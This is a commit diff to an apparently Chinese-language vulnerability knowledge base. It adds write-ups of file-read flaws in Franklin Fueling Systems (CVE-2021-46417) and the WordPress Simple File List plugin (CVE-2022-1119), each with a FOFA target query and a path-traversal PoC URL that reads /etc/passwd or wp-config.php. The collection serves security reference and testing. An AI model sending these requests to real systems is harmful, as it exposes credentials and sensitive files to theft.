Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
Threekiii committed Jul 15, 2022
1 parent b736415 commit dacede6
Show file tree
Hide file tree
Showing 4 changed files with 96 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
# Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417

## 漏洞描述

Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统。

Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件。

## 漏洞影响

```
Franklin Fueling Systems
```

## FOFA

```
"Franklin Fueling Systems"
```

## 漏洞复现

主页面

![image-20220715105504364](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151055481.png)

验证POC

```
/cgi-bin/tsaupload.cgi?file_name=../../../../../../etc/passwd&password=
```

![image-20220715105538276](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151055335.png)

Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
# WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119

## 漏洞描述

WordPress Simple File List插件 ee-downloader.php文件存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的任意文件

## 漏洞影响

```
WordPress Simple File List < 3.2.8
```

## 插件名

Simple File List

https://downloads.wordpress.org/plugin/simple-file-list.3.2.17.zip

## 漏洞复现

存在漏洞的文件为 `wp-content/plugins/simple-file-list/includes/ee-downloader.php`

![image-20220706134725779](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061347857.png)

```php
<?php // Simple File List - ee-downloader.php - rev 1.19 - mitchellbennis@gmail.com

// Force File to Download
// This script is accessed via javascript on ee-download.php

$eeFile = filter_var($_GET['eeFile'], FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_LOW);

if(is_readable($eeFile)) {

header('Pragma: public'); // required
header('Expires: 0'); // no cache
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Last-Modified: '. gmdate ('D, d M Y H:i:s', filemtime ($eeFile)) .' GMT');
header('Cache-Control: private',false);
header('Content-Type: ' . mime_content_type($eeFile) );
header('Content-Disposition: attachment; filename="'. basename($eeFile) .'"');
// header('Content-Transfer-Encoding: binary');
header('Content-Length: '. filesize($eeFile)); // provide file size
header('Connection: close');
readfile($eeFile); // Start the download

}
?>
```

直接传参获取文件信息, 验证POC

```
/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php
```

![image-20220706134750574](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061347645.png)
2 changes: 2 additions & 0 deletions docs-base/docs/appserver/_sidebar.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

* [ClickHouse-API-数据库接口未授权访问漏洞](appserver/ClickHouse-API-数据库接口未授权访问漏洞.md)
* [Elasticsearch-未授权访问](appserver/Elasticsearch-未授权访问.md)
* [Franklin-Fueling-Systems-tsaupload.cgi-任意文件读取漏洞-CVE-2021-46417](appserver/Franklin-Fueling-Systems-tsaupload.cgi-任意文件读取漏洞-CVE-2021-46417.md)
* [Git-for-Visual-Studio远程执行代码漏洞-CVE-2021-21300](appserver/Git-for-Visual-Studio远程执行代码漏洞-CVE-2021-21300.md)
* [Git-LFS-远程命令执行漏洞-CVE-2020-27955](appserver/Git-LFS-远程命令执行漏洞-CVE-2020-27955.md)
* [Microsoft-Exchange-SSRF漏洞-CVE-2021-26885](appserver/Microsoft-Exchange-SSRF漏洞-CVE-2021-26885.md)
Expand All @@ -20,6 +21,7 @@
* [VMware-Workspace-ONE-Access-SSTI漏洞-CVE-2022-22954](appserver/VMware-Workspace-ONE-Access-SSTI漏洞-CVE-2022-22954.md)
* [VoIPmonitor-远程命令执行漏洞-CVE-2021-30461](appserver/VoIPmonitor-远程命令执行漏洞-CVE-2021-30461.md)
* [Windows-Chrome-远程命令执行漏洞](appserver/Windows-Chrome-远程命令执行漏洞.md)
* [WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119](appserver/WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md)
* [WordPress-3DPrint-Lite-3dprint-lite-functions.php-任意文件上传漏洞](appserver/WordPress-3DPrint-Lite-3dprint-lite-functions.php-任意文件上传漏洞.md)
* [WordPress-Duplicator-duplicator.php-任意文件读取漏洞-CVE-2020-11738](appserver/WordPress-Duplicator-duplicator.php-任意文件读取漏洞-CVE-2020-11738.md)
* [WordPress-Redux-Framework-class-redux-helpers.php-敏感信息泄漏漏洞-CVE-2021-38314](appserver/WordPress-Redux-Framework-class-redux-helpers.php-敏感信息泄漏漏洞-CVE-2021-38314.md)
Expand Down
3 changes: 3 additions & 0 deletions docs-base/docs/iot/_sidebar.md
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,7 @@
* [Cisco-HyperFlex-HX-upload-任意文件上传漏洞-CVE-2021-1499](iot/Cisco-HyperFlex-HX-upload-任意文件上传漏洞-CVE-2021-1499.md)
* [Crestron-aj.html-账号密码泄漏漏洞-CVE-2022-23178](iot/Crestron-aj.html-账号密码泄漏漏洞-CVE-2022-23178.md)
* [D-Link-AC管理系统-默认账号密码](iot/D-Link-AC管理系统-默认账号密码.md)
* [D-LINK-DAP-2020-webproc-任意文件读取漏洞-CVE-2021-27250](iot/D-LINK-DAP-2020-webproc-任意文件读取漏洞-CVE-2021-27250.md)
* [D-Link-DAR-8000-importhtml.php-远程命令执行漏洞](iot/D-Link-DAR-8000-importhtml.php-远程命令执行漏洞.md)
* [D-Link-DCS系列监控-账号密码信息泄露漏洞-CVE-2020-25078](iot/D-Link-DCS系列监控-账号密码信息泄露漏洞-CVE-2020-25078.md)
* [D-Link-Dir-645-getcfg.php-账号密码泄露漏洞-CVE-2019-17506](iot/D-Link-Dir-645-getcfg.php-账号密码泄露漏洞-CVE-2019-17506.md)
Expand Down Expand Up @@ -89,6 +90,8 @@
* [宏电-H8922-后台任意文件读取漏洞-CVE-2021-28152](iot/宏电-H8922-后台任意文件读取漏洞-CVE-2021-28152.md)
* [宏电-H8922-后台命令执行漏洞-CVE-2021-28150](iot/宏电-H8922-后台命令执行漏洞-CVE-2021-28150.md)
* [宏电-H8922-后台管理员信息泄露漏洞-CVE-2021-28151](iot/宏电-H8922-后台管理员信息泄露漏洞-CVE-2021-28151.md)
* [小米-路由器-c_upload-远程命令执行漏洞-CVE-2019-18370](iot/小米-路由器-c_upload-远程命令执行漏洞-CVE-2019-18370.md)
* [小米-路由器-extdisks-任意文件读取漏洞-CVE-2019-18371](iot/小米-路由器-extdisks-任意文件读取漏洞-CVE-2019-18371.md)
* [悦泰节能-智能数据网关-resources-任意文件读取漏洞](iot/悦泰节能-智能数据网关-resources-任意文件读取漏洞.md)
* [惠尔顿-e地通-config.xml-信息泄漏漏洞](iot/惠尔顿-e地通-config.xml-信息泄漏漏洞.md)
* [朗视-TG400-GSM-网关目录遍历-CVE-2021-27328](iot/朗视-TG400-GSM-网关目录遍历-CVE-2021-27328.md)
Expand Down

0 comments on commit dacede6

Please sign in to comment.